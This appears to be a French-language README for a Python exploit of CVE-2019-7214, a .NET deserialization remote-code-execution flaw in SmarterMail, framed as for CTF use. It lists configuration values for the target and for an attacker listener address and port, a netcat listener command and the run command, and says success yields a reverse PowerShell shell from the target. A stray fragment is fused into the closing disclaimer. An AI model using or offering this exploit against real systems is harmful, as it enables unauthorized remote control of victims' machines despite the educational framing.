
For CTF use only (the CVE-2019-7214 also resolves the host from /etc/hosts)
Ce script Python cible un service vulnérable exécuté sur une machine Windows distante. Il envoie une charge utile .NET sérialisée qui déclenche un shell inversé basé sur PowerShell vers la machine de l'attaquant.
Exécution de code à distance via la désérialisation .NET pour le système SmarterMail.
Mettez à jour la section de configuration du script pour correspondre à votre environnement :
HOSTNAME = 'hostname' # Nom d'hôte cible (résolu via /etc/hosts)
PORT = 9999 # Port cible à l'écoute pour l'entrée sérialisée
LHOST = '192.168.45.185' # IP de l'attaquant (écouteur)
LPORT = 4444 # Port d'écoute de l'attaquant
nc -lvnp 4444
python3 CVE-2019-7214 .py
En cas de succès, vous obtiendrez une invite PowerShell de la cible sur votre écouteur.
System.Management.Automation.Ce script est fourni à des fins éducatives uniquement. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.